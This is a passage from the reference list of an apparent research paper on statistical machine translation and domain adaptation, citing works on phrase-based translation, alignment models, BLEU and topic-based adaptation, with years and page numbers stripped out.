koehn, franz och, and daniel marcu. . statistical phrase-based translation. in proceedings of naacl. philipp koehn, hieu hoang, alexandra birch, chris callison-burch, marcello federico, nicola bertoldi, brooke cowan, wade shen, christine moran, richard zens, chris dyer, ondřej bojar, alexandra con- stantin, and evan herbst. . moses: open source toolkit for statistical machine translation. in proceed- ings of acl. philipp koehn. . statistical significance tests for machine translation evaluation. in proceedings of emnlp. philipp koehn. . europarl: a parallel corpus for statistical machine translation. in proceedings of mtsummit. shankar kumar and william j. byrne. . minimum bayes-risk decoding for statistical machine translation. in hlt-naacl. saab mansour and hermann ney. . unsupervised adaptation for statistical machine translation. in pro- ceedings of wmt. spyros matsoukas, antti-veikko i. rosti, and bing zhang. . discriminative corpus weight esti- mation for machine translation. in proceedings of emnlp. andrew kachites mccallum. . mal- let: a machine learning for language toolkit. http://mallet.cs.umass.edu. markos mylonakis and khalil sima’an. . phrase translation probabilities with itg priors and smoothing as learning objective. in proceedings of emnlp. graham neubig, taro watanabe, eiichiro sumita, shin- suke mori, and tatsuya kawahara. . an unsuper- vised model for joint phrase alignment and extraction. in proceedings of acl-hlt. franz och and hermann ney. . a systematic com- parison of various statistical alignment models. com- put. linguist., pages – . franz och and hermann ney. . the alignment tem- plate approach to statistical machine translation. com- put. linguist., pages – . kishore papineni, salim roukos, todd ward, and wei- jing zhu. . bleu: a method for automatic evalu- ation of machine translation. in proceedings of acl. adam pauls, john denero, and dan klein. . con- sensus training for consensus decoding in machine translation. in proceedings of emnlp. majid razmara, george foster, baskaran sankaran, and anoop sarkar. . mixing multiple translation models in statistical machine translation. in proceed- ings of acl. rico sennrich, holger schwenk, and walid aransa. . a multi-domain translation model framework for statistical machine translation. in proceedings of acl. rico sennrich. a. mixture-modeling with unsuper- vised clusters for domain adaptation in statistical ma- chine translation. in proceedings of the eamt. rico sennrich. b. perplexity minimization for translation model domain adaptation in statistical ma- chine translation. in proceedings of eacl. david a. smith and jason eisner. . minimum risk annealing for training log-linear models. in proceed- ings of the coling/acl. matthew snover, bonnie dorr, r. schwartz, l. micciulla, and j. makhoul. . a study of translation edit rate with targeted human annotation. in proceedings of amta. jinsong su, deyi xiong, yang liu, xianpei han, hongyu lin, junfeng yao, and min zhang. . a context- aware topic model for statistical machine translation. in proceedings of the acl-ijcnlp. ivan titov. . domain adaptation by constraining inter-domain variability of latent feature representa- tion. in proceedings of acl. marlies van der wees, arianna bisazza, wouter weerkamp, and christof monz. . what’s in a domain? analyzing genre and topic differences in smt. in proceedings of acl-ijcnlp (short paper). hui zhang and david chiang. . kneser-ney smoothing on expected counts. in proceedings of acl. min zhang, xinyan xiao, deyi xiong, and qun liu. . topic-based dissimilarity and sensitivity mod- els for translation rule selection. jair. biao zhang, jinsong su, deyi xiong, hong duan, and junfeng yao. . discriminative reordering model adaptation via structural learning. in ijcai.